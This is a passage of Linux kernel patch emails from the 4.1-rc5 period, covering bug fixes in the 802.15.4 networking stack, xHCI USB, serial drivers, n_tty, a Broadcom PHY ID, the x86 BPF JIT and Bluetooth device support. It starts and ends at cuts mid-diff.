ARPHRD_IEEE802154); - pan_id = ieee802154_mlme_ops(dev)->get_pan_id(dev); - short_addr = ieee802154_mlme_ops(dev)->get_short_addr(dev); - hw_addr = ieee802154_devaddr_from_raw(dev->dev_addr); + pan_id = dev->ieee802154_ptr->pan_id; + short_addr = dev->ieee802154_ptr->short_addr; + hw_addr = dev->ieee802154_ptr->extended_addr; read_lock(&dgram_lock); sk_for_each(sk, &dgram_head) { diff --git a/net/mac802154/ieee802154_i.h b/net/mac802154/ieee802154_i.h index 56b3847466e9..eec668f3637f 100644 --- a/net/mac802154/ieee802154_i.h +++ b/net/mac802154/ieee802154_i.h @@ -86,8 +86,6 @@ struct ieee802154_sub_if_data { unsigned long state; char name[IFNAMSIZ]; - spinlock_t mib_lock; - /* protects sec from concurrent access by netlink. access by * encrypt/decrypt/header_create safe without additional protection. */ @@ -136,10 +134,6 @@ ieee802154_subif_start_xmit(struct sk_buff *skb, struct net_device *dev); enum hrtimer_restart ieee802154_xmit_ifs_timer(struct hrtimer *timer); /* MIB callbacks */ -void mac802154_dev_set_short_addr(struct net_device *dev, __le16 val); -__le16 mac802154_dev_get_short_addr(const struct net_device *dev); -__le16 mac802154_dev_get_pan_id(const struct net_device *dev); -void mac802154_dev_set_pan_id(struct net_device *dev, __le16 val); void mac802154_dev_set_page_channel(struct net_device *dev, u8 page, u8 chan); int mac802154_get_params(struct net_device *dev, diff --git a/net/mac802154/iface.c b/net/mac802154/iface.c index 0ec7bc402e29..f30788d2702f 100644 --- a/net/mac802154/iface.c +++ b/net/mac802154/iface.c @@ -63,7 +63,6 @@ mac802154_wpan_ioctl(struct net_device *dev, struct ifreq *ifr, int cmd) int err = -ENOIOCTLCMD; rtnl_lock(); - spin_lock_bh(&sdata->mib_lock); switch (cmd) { case SIOCGIFADDR: @@ -88,7 +87,6 @@ mac802154_wpan_ioctl(struct net_device *dev, struct ifreq *ifr, int cmd) } case SIOCSIFADDR: if (netif_running(dev)) { - spin_unlock_bh(&sdata->mib_lock); rtnl_unlock(); return -EBUSY; } @@ -111,7 +109,6 @@ mac802154_wpan_ioctl(struct net_device *dev, struct ifreq *ifr, int cmd) break; } - spin_unlock_bh(&sdata->mib_lock); rtnl_unlock(); return err; } @@ -374,8 +371,6 @@ static int mac802154_header_create(struct sk_buff *skb, return -EINVAL; if (!saddr) { - spin_lock_bh(&sdata->mib_lock); - if (wpan_dev->short_addr == cpu_to_le16(IEEE802154_ADDR_BROADCAST) || wpan_dev->short_addr == cpu_to_le16(IEEE802154_ADDR_UNDEF) || wpan_dev->pan_id == cpu_to_le16(IEEE802154_PANID_BROADCAST)) { @@ -387,8 +382,6 @@ static int mac802154_header_create(struct sk_buff *skb, } hdr.source.pan_id = wpan_dev->pan_id; - - spin_unlock_bh(&sdata->mib_lock); } else { hdr.source = *(const struct ieee802154_addr *)saddr; } @@ -500,7 +493,6 @@ ieee802154_setup_sdata(struct ieee802154_sub_if_data *sdata, sdata->dev->ml_priv = &mac802154_mlme_wpan; wpan_dev->promiscuous_mode = false; - spin_lock_init(&sdata->mib_lock); mutex_init(&sdata->sec_mtx); mac802154_llsec_init(&sdata->sec); diff --git a/net/mac802154/mac_cmd.c b/net/mac802154/mac_cmd.c index 3b347d4d3d4c..5220c2b2735b 100644 --- a/net/mac802154/mac_cmd.c +++ b/net/mac802154/mac_cmd.c @@ -43,8 +43,8 @@ static int mac802154_mlme_start_req(struct net_device *dev, BUG_ON(addr->mode != IEEE802154_ADDR_SHORT); - mac802154_dev_set_pan_id(dev, addr->pan_id); - mac802154_dev_set_short_addr(dev, addr->short_addr); + dev->ieee802154_ptr->pan_id = addr->pan_id; + dev->ieee802154_ptr->short_addr = addr->short_addr; mac802154_dev_set_page_channel(dev, page, channel); if (ops->llsec) { @@ -151,8 +151,6 @@ static struct ieee802154_llsec_ops mac802154_llsec_ops = { struct ieee802154_mlme_ops mac802154_mlme_wpan = { .start_req = mac802154_mlme_start_req, - .get_pan_id = mac802154_dev_get_pan_id, - .get_short_addr = mac802154_dev_get_short_addr, .llsec = &mac802154_llsec_ops, diff --git a/net/mac802154/mib.c b/net/mac802154/mib.c index 00a62de9cc23..73f94fbf8785 100644 --- a/net/mac802154/mib.c +++ b/net/mac802154/mib.c @@ -26,56 +26,6 @@ #include "ieee802154_i.h" #include "driver-ops.h" -void mac802154_dev_set_short_addr(struct net_device *dev, __le16 val) -{ - struct ieee802154_sub_if_data *sdata = IEEE802154_DEV_TO_SUB_IF(dev); - - BUG_ON(dev->type != ARPHRD_IEEE802154); - - spin_lock_bh(&sdata->mib_lock); - sdata->wpan_dev.short_addr = val; - spin_unlock_bh(&sdata->mib_lock); -} - -__le16 mac802154_dev_get_short_addr(const struct net_device *dev) -{ - struct ieee802154_sub_if_data *sdata = IEEE802154_DEV_TO_SUB_IF(dev); - __le16 ret; - - BUG_ON(dev->type != ARPHRD_IEEE802154); - - spin_lock_bh(&sdata->mib_lock); - ret = sdata->wpan_dev.short_addr; - spin_unlock_bh(&sdata->mib_lock); - - return ret; -} - -__le16 mac802154_dev_get_pan_id(const struct net_device *dev) -{ - struct ieee802154_sub_if_data *sdata = IEEE802154_DEV_TO_SUB_IF(dev); - __le16 ret; - - BUG_ON(dev->type != ARPHRD_IEEE802154); - - spin_lock_bh(&sdata->mib_lock); - ret = sdata->wpan_dev.pan_id; - spin_unlock_bh(&sdata->mib_lock); - - return ret; -} - -void mac802154_dev_set_pan_id(struct net_device *dev, __le16 val) -{ - struct ieee802154_sub_if_data *sdata = IEEE802154_DEV_TO_SUB_IF(dev); - - BUG_ON(dev->type != ARPHRD_IEEE802154); - - spin_lock_bh(&sdata->mib_lock); - sdata->wpan_dev.pan_id = val; - spin_unlock_bh(&sdata->mib_lock); -} - void mac802154_dev_set_page_channel(struct net_device *dev, u8 page, u8 chan) { struct ieee802154_sub_if_data *sdata = IEEE802154_DEV_TO_SUB_IF(dev); diff --git a/net/mac802154/rx.c b/net/mac802154/rx.c index c0d67b2b4132..e0f10063cac3 100644 --- a/net/mac802154/rx.c +++ b/net/mac802154/rx.c @@ -47,8 +47,6 @@ ieee802154_subif_frame(struct ieee802154_sub_if_data *sdata, pr_debug("getting packet via slave interface %s\n", sdata->dev->name); - spin_lock_bh(&sdata->mib_lock); - span = wpan_dev->pan_id; sshort = wpan_dev->short_addr; @@ -83,13 +81,10 @@ ieee802154_subif_frame(struct ieee802154_sub_if_data *sdata, skb->pkt_type = PACKET_OTHERHOST; break; default: - spin_unlock_bh(&sdata->mib_lock); pr_debug("invalid dest mode\n"); goto fail; } - spin_unlock_bh(&sdata->mib_lock); - skb->dev = sdata->dev; rc = mac802154_llsec_decrypt(&sdata->sec, skb); From ae425bb2a05bebe786a25cc8ae64e9d16c4d9b83 Mon Sep 17 00:00:00 2001 From: "Vittorio G (VittGam)" Date: Fri, 22 May 2015 21:15:19 +0200 Subject: [PATCH 170/872] ALSA: usb-audio: Add quirk for MS LifeCam HD-3000 Microsoft LifeCam HD-3000 (045e:0779) needs a similar quirk for suppressing the unsupported sample rate inquiry. Bugzilla: https://bugzilla.kernel.org/show_bug.cgi?id=98481 Cc: Signed-off-by: Vittorio Gambaletta Signed-off-by: Takashi Iwai --- sound/usb/quirks.c | 1 + 1 file changed, 1 insertion(+) diff --git a/sound/usb/quirks.c b/sound/usb/quirks.c index 46facfc9aec1..29175346cc4f 100644 --- a/sound/usb/quirks.c +++ b/sound/usb/quirks.c @@ -1118,6 +1118,7 @@ bool snd_usb_get_sample_rate_quirk(struct snd_usb_audio *chip) case USB_ID(0x045E, 0x075D): /* MS Lifecam Cinema */ case USB_ID(0x045E, 0x076D): /* MS Lifecam HD-5000 */ case USB_ID(0x045E, 0x0772): /* MS Lifecam Studio */ + case USB_ID(0x045E, 0x0779): /* MS Lifecam HD-3000 */ case USB_ID(0x04D8, 0xFEEA): /* Benchmark DAC1 Pre */ return true; } From 3530febb5c7636f6b26d15637f68296804d26491 Mon Sep 17 00:00:00 2001 From: Takashi Iwai Date: Sun, 24 May 2015 08:27:52 +0200 Subject: [PATCH 171/872] Revert "ALSA: hda - Add mute-LED mode control to Thinkpad" MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit This reverts commit 7290006d8c0900c56d8c58428134f02c35109d17. Through the regression report, it was revealed that the tpacpi_led_set() call to thinkpad_acpi helper doesn't only toggle the mute LED but actually mutes the sound. This is contradiction to the expectation, and rather confuses user. According to Henrique, it's not trivial to judge which TP model behaves "LED-only" and which model does whatever more intrusive, as Lenovo's implementations vary model by model. So, from the safety reason, we should revert the patch for now. Reported-by: Martin Steigerwald Cc: Pali Rohár Cc: Signed-off-by: Takashi Iwai --- sound/pci/hda/thinkpad_helper.c | 1 - 1 file changed, 1 deletion(-) diff --git a/sound/pci/hda/thinkpad_helper.c b/sound/pci/hda/thinkpad_helper.c index d51703e30523..0a4ad5feb82e 100644 --- a/sound/pci/hda/thinkpad_helper.c +++ b/sound/pci/hda/thinkpad_helper.c @@ -72,7 +72,6 @@ static void hda_fixup_thinkpad_acpi(struct hda_codec *codec, if (led_set_func(TPACPI_LED_MUTE, false) >= 0) { old_vmaster_hook = spec->vmaster_mute.hook; spec->vmaster_mute.hook = update_tpacpi_mute_led; - spec->vmaster_mute_enum = 1; removefunc = false; } if (led_set_func(TPACPI_LED_MICMUTE, false) >= 0) { From b04c846ceaad42f9e37f3626c7e8f457603863f0 Mon Sep 17 00:00:00 2001 From: Arthur Demchenkov Date: Tue, 19 May 2015 16:30:50 +0300 Subject: [PATCH 172/872] usb: make module xhci_hcd removable Fixed regression. After commit 29e409f0f761 ("xhci: Allow xHCI drivers to be built as separate modules") the module xhci_hcd became non-removable. That behaviour is not expected and there're no notes about it in commit message. The module should be removable as it blocks PM suspend/resume functions (Debian Bug#666406). Signed-off-by: Arthur Demchenkov Reviewed-by: Andrew Bresticker Cc: # v3.18+ Signed-off-by: Mathias Nyman Signed-off-by: Greg Kroah-Hartman --- drivers/usb/host/xhci.c | 8 ++++++++ 1 file changed, 8 insertions(+) diff --git a/drivers/usb/host/xhci.c b/drivers/usb/host/xhci.c index ec8ac1674854..4299cbf47793 100644 --- a/drivers/usb/host/xhci.c +++ b/drivers/usb/host/xhci.c @@ -5011,4 +5011,12 @@ static int __init xhci_hcd_init(void) BUILD_BUG_ON(sizeof(struct xhci_run_regs) != (8+8*128)*32/8); return 0; } + +/* + * If an init function is provided, an exit function must also be provided + * to allow module unload. + */ +static void __exit xhci_hcd_fini(void) { } + module_init(xhci_hcd_init); +module_exit(xhci_hcd_fini); From a00918d0521df1c7a2ec9143142a3ea998c8526d Mon Sep 17 00:00:00 2001 From: Chris Bainbridge Date: Tue, 19 May 2015 16:30:51 +0300 Subject: [PATCH 173/872] usb: host: xhci: add mutex for non-thread-safe data Regression in commit 638139eb95d2 ("usb: hub: allow to process more usb hub events in parallel") The regression resulted in intermittent failure to initialise a 10-port hub (with three internal VL812 4-port hub controllers) on boot, with a failure rate of around 8%, due to multiple race conditions when accessing addr_dev and slot_id in struct xhci_hcd. This regression also exposed a problem with xhci_setup_device, which "should be protected by the usb_address0_mutex" but no longer is due to commit 6fecd4f2a58c ("USB: separate usb_address0 mutexes for each bus") With separate buses (and locks) it is no longer the case that a single lock will protect xhci_setup_device from accesses by two parallel threads processing events on the two buses. Fix this by adding a mutex to protect addr_dev and slot_id in struct xhci_hcd, and by making the assignment of slot_id atomic. Fixes multiple boot errors: [ 0.583008] xhci_hcd 0000:00:14.0: Bad Slot ID 2 [ 0.583009] xhci_hcd 0000:00:14.0: Could not allocate xHCI USB device data structures [ 0.583012] usb usb1-port3: couldn't allocate usb_device And: [ 0.637409] xhci_hcd 0000:00:14.0: Error while assigning device slot ID [ 0.637417] xhci_hcd 0000:00:14.0: Max number of devices this xHCI host supports is 32. [ 0.637421] usb usb1-port1: couldn't allocate usb_device And: [ 0.753372] xhci_hcd 0000:00:14.0: ERROR: unexpected setup context command completion code 0x0. [ 0.753373] usb 1-3: hub failed to enable device, error -22 [ 0.753400] xhci_hcd 0000:00:14.0: Error while assigning device slot ID [ 0.753402] xhci_hcd 0000:00:14.0: Max number of devices this xHCI host supports is 32. [ 0.753403] usb usb1-port3: couldn't allocate usb_device And: [ 11.018386] usb 1-3: device descriptor read/all, error -110 And: [ 5.753838] xhci_hcd 0000:00:14.0: Timeout while waiting for setup device command Tested with 200 reboots, resulting in no USB hub init related errors. Fixes: 638139eb95d2 ("usb: hub: allow to process more usb hub events in parallel") Link: https://lkml.kernel.org/g/CAP-bSRb=A0iEYobdGCLpwynS7pkxpt_9ZnwyZTPVAoy0Y=Zo3Q@mail.gmail.com Signed-off-by: Chris Bainbridge Cc: # 3.18+ [changed git commit description style for checkpatch -Mathias] Signed-off-by: Mathias Nyman Signed-off-by: Greg Kroah-Hartman --- drivers/usb/host/xhci.c | 49 +++++++++++++++++++++++++---------------- drivers/usb/host/xhci.h | 2 ++ 2 files changed, 32 insertions(+), 19 deletions(-) diff --git a/drivers/usb/host/xhci.c b/drivers/usb/host/xhci.c index 4299cbf47793..36bf089b708f 100644 --- a/drivers/usb/host/xhci.c +++ b/drivers/usb/host/xhci.c @@ -3682,18 +3682,21 @@ int xhci_alloc_dev(struct usb_hcd *hcd, struct usb_device *udev) { struct xhci_hcd *xhci = hcd_to_xhci(hcd); unsigned long flags; - int ret; + int ret, slot_id; struct xhci_command *command; command = xhci_alloc_command(xhci, false, false, GFP_KERNEL); if (!command) return 0; + /* xhci->slot_id and xhci->addr_dev are not thread-safe */ + mutex_lock(&xhci->mutex); spin_lock_irqsave(&xhci->lock, flags); command->completion = &xhci->addr_dev; ret = xhci_queue_slot_control(xhci, command, TRB_ENABLE_SLOT, 0); if (ret) { spin_unlock_irqrestore(&xhci->lock, flags); + mutex_unlock(&xhci->mutex); xhci_dbg(xhci, "FIXME: allocate a command ring segment\n"); kfree(command); return 0; @@ -3702,8 +3705,10 @@ int xhci_alloc_dev(struct usb_hcd *hcd, struct usb_device *udev) spin_unlock_irqrestore(&xhci->lock, flags); wait_for_completion(command->completion); + slot_id = xhci->slot_id; + mutex_unlock(&xhci->mutex); - if (!xhci->slot_id || command->status != COMP_SUCCESS) { + if (!slot_id || command->status != COMP_SUCCESS) { xhci_err(xhci, "Error while assigning device slot ID\n"); xhci_err(xhci, "Max number of devices this xHCI host supports is %u.\n", HCS_MAX_SLOTS( @@ -3728,11 +3733,11 @@ int xhci_alloc_dev(struct usb_hcd *hcd, struct usb_device *udev) * xhci_discover_or_reset_device(), which may be called as part of * mass storage driver error handling. */ - if (!xhci_alloc_virt_device(xhci, xhci->slot_id, udev, GFP_NOIO)) { + if (!xhci_alloc_virt_device(xhci, slot_id, udev, GFP_NOIO)) { xhci_warn(xhci, "Could not allocate xHCI USB device data structures\n"); goto disable_slot; } - udev->slot_id = xhci->slot_id; + udev->slot_id = slot_id; #ifndef CONFIG_USB_DEFAULT_PERSIST /* @@ -3778,12 +3783,15 @@ static int xhci_setup_device(struct usb_hcd *hcd, struct usb_device *udev, struct xhci_slot_ctx *slot_ctx; struct xhci_input_control_ctx *ctrl_ctx; u64 temp_64; - struct xhci_command *command; + struct xhci_command *command = NULL; + + mutex_lock(&xhci->mutex); if (!udev->slot_id) { xhci_dbg_trace(xhci, trace_xhci_dbg_address, "Bad Slot ID %d", udev->slot_id); - return -EINVAL; + ret = -EINVAL; + goto out; } virt_dev = xhci->devs[udev->slot_id]; @@ -3796,7 +3804,8 @@ static int xhci_setup_device(struct usb_hcd *hcd, struct usb_device *udev, */ xhci_warn(xhci, "Virt dev invalid for slot_id 0x%x!\n", udev->slot_id); - return -EINVAL; + ret = -EINVAL; + goto out; } if (setup == SETUP_CONTEXT_ONLY) { @@ -3804,13 +3813,15 @@ static int xhci_setup_device(struct usb_hcd *hcd, struct usb_device *udev, if (GET_SLOT_STATE(le32_to_cpu(slot_ctx->dev_state)) == SLOT_STATE_DEFAULT) { xhci_dbg(xhci, "Slot already in default state\n"); - return 0; + goto out; } } command = xhci_alloc_command(xhci, false, false, GFP_KERNEL); - if (!command) - return -ENOMEM; + if (!command) { + ret = -ENOMEM; + goto out; + } command->in_ctx = virt_dev->in_ctx; command->completion = &xhci->addr_dev; @@ -3820,8 +3831,8 @@ static int xhci_setup_device(struct usb_hcd *hcd, struct usb_device *udev, if (!ctrl_ctx) { xhci_warn(xhci, "%s: Could not get input context, bad type.\n", __func__); - kfree(command); - return -EINVAL; + ret = -EINVAL; + goto out; } /* * If this is the first Set Address since device plug-in or @@ -3848,8 +3859,7 @@ static int xhci_setup_device(struct usb_hcd *hcd, struct usb_device *udev, spin_unlock_irqrestore(&xhci->lock, flags); xhci_dbg_trace(xhci, trace_xhci_dbg_address, "FIXME: allocate a command ring segment"); - kfree(command); - return ret; + goto out; } xhci_ring_cmd_db(xhci); spin_unlock_irqrestore(&xhci->lock, flags); @@ -3896,10 +3906,8 @@ static int xhci_setup_device(struct usb_hcd *hcd, struct usb_device *udev, ret = -EINVAL; break; } - if (ret) { - kfree(command); - return ret; - } + if (ret) + goto out; temp_64 = xhci_read_64(xhci, &xhci->op_regs->dcbaa_ptr); xhci_dbg_trace(xhci, trace_xhci_dbg_address, "Op regs DCBAA ptr = %#016llx", temp_64); @@ -3932,8 +3940,10 @@ static int xhci_setup_device(struct usb_hcd *hcd, struct usb_device *udev, xhci_dbg_trace(xhci, trace_xhci_dbg_address, "Internal device address = %d", le32_to_cpu(slot_ctx->dev_state) & DEV_ADDR_MASK); +out: + mutex_unlock(&xhci->mutex); kfree(command); - return 0; + return ret; } int xhci_address_device(struct usb_hcd *hcd, struct usb_device *udev) @@ -4855,6 +4865,7 @@ int xhci_gen_setup(struct usb_hcd *hcd, xhci_get_quirks_t get_quirks) return 0; } + mutex_init(&xhci->mutex); xhci->cap_regs = hcd->regs; xhci->op_regs = hcd->regs + HC_LENGTH(readl(&xhci->cap_regs->hc_capbase)); diff --git a/drivers/usb/host/xhci.h b/drivers/usb/host/xhci.h index ea75e8ccd3c1..6977f8491fa7 100644 --- a/drivers/usb/host/xhci.h +++ b/drivers/usb/host/xhci.h @@ -1497,6 +1497,8 @@ struct xhci_hcd { struct list_head lpm_failed_devs; /* slot enabling and address device helpers */ + /* these are not thread safe so use mutex */ + struct mutex mutex; struct completion addr_dev; int slot_id; /* For USB 3.0 LPM enable/disable. */ From 43dd1f9a5b05d6db2cb258354a01ace63baa5c0b Mon Sep 17 00:00:00 2001 From: Dave Martin Date: Thu, 21 May 2015 16:37:49 +0100 Subject: [PATCH 174/872] serial/amba-pl011: Unconditionally poll for FIFO space before each TX char Commit 734745caeb9f155ab58918834a8c70e83fa6afd3 serial/amba-pl011: (Activate TX IRQ passively) introduces a race which causes the driver sometimes to attempt to write a character to the TX FIFO when the FIFO is already full. The PL011 does not guarantee its behaviour when the FIFO is overfilled. In practice, this can cause duplicate and/or dropped characters to be output on the wire. The problem is common enough to be readily observable on the ARM Juno platform when the PL011 UART is used as the console and DMA is not in use. This patch fixes this problem by always polling for space before each character is written to the FIFO. This will be amended to a less brute-force approach in a later commit, but this patch should help ensure correct behaviour for now. Signed-off-by: Dave Martin Signed-off-by: Greg Kroah-Hartman --- drivers/tty/serial/amba-pl011.c | 16 ++++++++-------- 1 file changed, 8 insertions(+), 8 deletions(-) diff --git a/drivers/tty/serial/amba-pl011.c b/drivers/tty/serial/amba-pl011.c index 6f5a0720a8c8..763eb20fe321 100644 --- a/drivers/tty/serial/amba-pl011.c +++ b/drivers/tty/serial/amba-pl011.c @@ -1249,20 +1249,19 @@ __acquires(&uap->port.lock) /* * Transmit a character - * There must be at least one free entry in the TX FIFO to accept the char. * - * Returns true if the FIFO might have space in it afterwards; - * returns false if the FIFO definitely became full. + * Returns true if the character was successfully queued to the FIFO. + * Returns false otherwise. */ static bool pl011_tx_char(struct uart_amba_port *uap, unsigned char c) { + if (readw(uap->port.membase + UART01x_FR) & UART01x_FR_TXFF) + return false; /* unable to transmit character */ + writew(c, uap->port.membase + UART01x_DR); uap->port.icount.tx++; - if (likely(uap->tx_irq_seen > 1)) - return true; - - return !(readw(uap->port.membase + UART01x_FR) & UART01x_FR_TXFF); + return true; } static bool pl011_tx_chars(struct uart_amba_port *uap) @@ -1296,7 +1295,8 @@ static bool pl011_tx_chars(struct uart_amba_port *uap) return false; if (uap->port.x_char) { - pl011_tx_char(uap, uap->port.x_char); + if (!pl011_tx_char(uap, uap->port.x_char)) + goto done; uap->port.x_char = 0; --count; } From 392bceedb107a3dc1d4287e63d7670d08f702feb Mon Sep 17 00:00:00 2001 From: Philipp Zabel Date: Tue, 19 May 2015 10:54:09 +0200 Subject: [PATCH 175/872] serial: imx: Fix DMA handling for IDLE condition aborts The driver configures the IDLE condition to interrupt the SDMA engine. Since the SDMA UART ROM script doesn't clear the IDLE bit itself, this caused repeated 1-byte DMA transfers, regardless of available data in the RX FIFO. Also, when returning due to the IDLE condition, the UART ROM script already increased its counter, causing residue to be off by one. This patch clears the IDLE condition to avoid repeated 1-byte DMA transfers and decreases count by when the DMA transfer was aborted due to the IDLE condition, fixing serial transfers using DMA on i.MX6Q. Reported-by: Peter Seiderer Signed-off-by: Philipp Zabel Tested-by: Fabio Estevam Cc: stable Signed-off-by: Greg Kroah-Hartman --- drivers/tty/serial/imx.c | 8 ++++++++ 1 file changed, 8 insertions(+) diff --git a/drivers/tty/serial/imx.c b/drivers/tty/serial/imx.c index c8cfa0637128..88250395b0ce 100644 --- a/drivers/tty/serial/imx.c +++ b/drivers/tty/serial/imx.c @@ -911,6 +911,14 @@ static void dma_rx_callback(void *data) status = dmaengine_tx_status(chan, (dma_cookie_t)0, &state); count = RX_BUF_SIZE - state.residue; + + if (readl(sport->port.membase + USR2) & USR2_IDLE) { + /* In condition [3] the SDMA counted up too early */ + count--; + + writel(USR2_IDLE, sport->port.membase + USR2); + } + dev_dbg(sport->port.dev, "We get %d bytes.\n", count); if (count) { From da555db6b06340e3f6b4b0a0448c30bebfe23b0a Mon Sep 17 00:00:00 2001 From: Mark Tomlinson Date: Mon, 18 May 2015 12:01:48 +1200 Subject: [PATCH 176/872] n_tty: Fix calculation of size in canon_copy_from_read_buf There was a hardcoded value of 4096 which should have been N_TTY_BUF_SIZE. This caused reads from tty to fail with EFAULT when they shouldn't have done if N_TTY_BUF_SIZE was declared to be something other than 4096. Signed-off-by: Mark Tomlinson Reviewed-by: Peter Hurley Signed-off-by: Greg Kroah-Hartman --- drivers/tty/n_tty.c | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/drivers/tty/n_tty.c b/drivers/tty/n_tty.c index cc57a3a6b02b..759604e57b24 100644 --- a/drivers/tty/n_tty.c +++ b/drivers/tty/n_tty.c @@ -2070,8 +2070,8 @@ static int canon_copy_from_read_buf(struct tty_struct *tty, size = N_TTY_BUF_SIZE - tail; n = eol - tail; - if (n > 4096) - n += 4096; + if (n > N_TTY_BUF_SIZE) + n += N_TTY_BUF_SIZE; n += found; c = n; From ba155e2d21f6bf05de86a78dbe5bfd8757604a65 Mon Sep 17 00:00:00 2001 From: Linus Torvalds Date: Sun, 24 May 2015 18:22:35 -0700 Subject: [PATCH 177/872] Linux 4.1-rc5 --- Makefile | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Makefile b/Makefile index dc20bcb9b271..92a707859205 100644 --- a/Makefile +++ b/Makefile @@ -1,7 +1,7 @@ VERSION = 4 PATCHLEVEL = 1 SUBLEVEL = 0 -EXTRAVERSION = -rc4 +EXTRAVERSION = -rc5 NAME = Hurr durr I'ma sheep # *DOCUMENTATION* From cc4a84c3da6f9dd6a297dc81fe4437643a60fe03 Mon Sep 17 00:00:00 2001 From: Florian Fainelli Date: Fri, 22 May 2015 14:07:30 -0700 Subject: [PATCH 178/872] net: phy: bcm7xxx: Fix 7425 PHY ID and flags While adding support for 7425 PHY in the 7xxx PHY driver, the ID that was used was actually coming from an external PHY: a BCM5461x. Fix this by using the proper ID for the internal 7425 PHY and set the PHY_IS_INTERNAL flag, otherwise consumers of this PHY driver would not be able to properly identify it as such. Fixes: d068b02cfdfc2 ("net: phy: add BCM7425 and BCM7429 PHYs") Signed-off-by: Florian Fainelli Reviewed-by: Petri Gynther Signed-off-by: David S. Miller --- drivers/net/phy/bcm7xxx.c | 2 +- include/linux/brcmphy.h | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/drivers/net/phy/bcm7xxx.c b/drivers/net/phy/bcm7xxx.c index 64c74c6a4828..b5dc59de094e 100644 --- a/drivers/net/phy/bcm7xxx.c +++ b/drivers/net/phy/bcm7xxx.c @@ -404,7 +404,7 @@ static struct phy_driver bcm7xxx_driver[] = { .name = "Broadcom BCM7425", .features = PHY_GBIT_FEATURES | SUPPORTED_Pause | SUPPORTED_Asym_Pause, - .flags = 0, + .flags = PHY_IS_INTERNAL, .config_init = bcm7xxx_config_init, .config_aneg = genphy_config_aneg, .read_status = genphy_read_status, diff --git a/include/linux/brcmphy.h b/include/linux/brcmphy.h index ae2982c0f7a6..656da2a12ffe 100644 --- a/include/linux/brcmphy.h +++ b/include/linux/brcmphy.h @@ -17,7 +17,7 @@ #define PHY_ID_BCM7250 0xae025280 #define PHY_ID_BCM7364 0xae025260 #define PHY_ID_BCM7366 0x600d8490 -#define PHY_ID_BCM7425 0x03625e60 +#define PHY_ID_BCM7425 0x600d86b0 #define PHY_ID_BCM7429 0x600d8730 #define PHY_ID_BCM7439 0x600d8480 #define PHY_ID_BCM7439_2 0xae025080 From 3f7352bf21f8fd7ba3e2fcef9488756f188e12be Mon Sep 17 00:00:00 2001 From: Alexei Starovoitov Date: Fri, 22 May 2015 15:42:55 -0700 Subject: [PATCH 179/872] x86: bpf_jit: fix compilation of large bpf programs x86 has variable length encoding. x86 JIT compiler is trying to pick the shortest encoding for given bpf instruction. While doing so the jump targets are changing, so JIT is doing multiple passes over the program. Typical program needs 3 passes. Some very short programs converge with 2 passes. Large programs may need 4 or 5. But specially crafted bpf programs may hit the pass limit and if the program converges on the last iteration the JIT compiler will be producing an image full of 'int 3' insns. Fix this corner case by doing final iteration over bpf program. Fixes: 0a14842f5a3c ("net: filter: Just In Time compiler for x86-64") Reported-by: Daniel Borkmann Signed-off-by: Alexei Starovoitov Tested-by: Daniel Borkmann Acked-by: Daniel Borkmann Signed-off-by: David S. Miller --- arch/x86/net/bpf_jit_comp.c | 7 ++++++- 1 file changed, 6 insertions(+), 1 deletion(-) diff --git a/arch/x86/net/bpf_jit_comp.c b/arch/x86/net/bpf_jit_comp.c index 99f76103c6b7..ddeff4844a10 100644 --- a/arch/x86/net/bpf_jit_comp.c +++ b/arch/x86/net/bpf_jit_comp.c @@ -966,7 +966,12 @@ void bpf_int_jit_compile(struct bpf_prog *prog) } ctx.cleanup_addr = proglen; - for (pass = 0; pass < 10; pass++) { + /* JITed image shrinks with every pass and the loop iterates + * until the image stops shrinking. Very large bpf programs + * may converge on the last pass. In such case do one more + * pass to emit the final image + */ + for (pass = 0; pass < 10 || image; pass++) { proglen = do_jit(prog, addrs, image, oldproglen, &ctx); if (proglen <= 0) { image = NULL; From 7f6e63631dbd7fd6689b4ee301d0eea0f34c5535 Mon Sep 17 00:00:00 2001 From: Chan-yeol Park Date: Thu, 21 May 2015 11:24:27 +0900 Subject: [PATCH 180/872] Bluetooth: btusb: Support QCA61x4 ROME v2.0 The previous commit(3267c88) missed QCA61x4 ROME v2.0 info on Samsung so its BT is not activated and the below message is shown. [ 8.009638] usb 1-1: New USB device found, idVendor=0cf3, idProduct=e300 [ 8.012637] usb 1-1: New USB device strings: Mfr=0, Product=0, SerialNumber=0 [ 8.102901] Bluetooth: hci0: don't support firmware rome 0x200 This patch adds QCA61x4 ROME v2.0 info in qca_devices_table[], and is verified on Samsung with the firmware provided by Kim, Ben Young Tae . T: Bus=01 Lev=01 Prnt=01 Port=00 Cnt=01 Dev#= 2 Spd=12 MxCh= 0 D: Ver= 1.10 Cls=e0(wlcon) Sub=01 Prot=01 MxPS=64 #Cfgs= 1 P: Vendor=0cf3 ProdID=e300 Rev= 0.01 C:* #Ifs= 2 Cfg#= 1 Atr=e0 MxPwr=100mA I:* If#= 0 Alt= 0 #EPs= 3 Cls=e0(wlcon) Sub=01 Prot=01 Driver=btusb E: Ad=81(I) Atr=03(Int.) MxPS= 16 Ivl=1ms E: Ad=82(I) Atr=02(Bulk) MxPS= 64 Ivl=0ms E: Ad=02(O) Atr=02(Bulk) MxPS= 64 Ivl=0ms I:* If#= 1 Alt= 0 #EPs= 2 Cls=e0(wlcon) Sub=01 Prot=01 Driver=btusb E: Ad=83(I) Atr=01(Isoc) MxPS= 0 Ivl=1ms E: Ad=03(O) Atr=01(Isoc) MxPS= 0 Ivl=1ms I: If#= 1 Alt= 1 #EPs= 2 Cls=e0(wlcon) Sub=01 Prot=01 Driver=btusb E: Ad=83(I) Atr=01(Isoc) MxPS= 9 Ivl=1ms E: Ad=03(O) Atr=01(Isoc) MxPS= 9 Ivl=1ms I: If#= 1 Alt= 2 #EPs= 2 Cls=e0(wlcon) Sub=01 Prot=01 Driver=btusb E: Ad=83(I) Atr=01(Isoc) MxPS= 17 Ivl=1ms E: Ad=03(O) Atr=01(Isoc) MxPS= 17 Ivl=1ms I: If#= 1 Alt= 3 #EPs= 2 Cls=e0(wlcon) Sub=01 Prot=01 Driver=btusb E: Ad=83(I) Atr=01(Isoc) MxPS= 25 Ivl=1ms E: Ad=03(O) Atr=01(Isoc) MxPS= 25 Ivl=1ms I: If#= 1 Alt= 4 #EPs= 2 Cls=e0(wlcon) Sub=01 Prot=01 Driver=btusb E: Ad=83(I) Atr=01(Isoc) MxPS= 33 Ivl=1ms E: Ad=03(O) 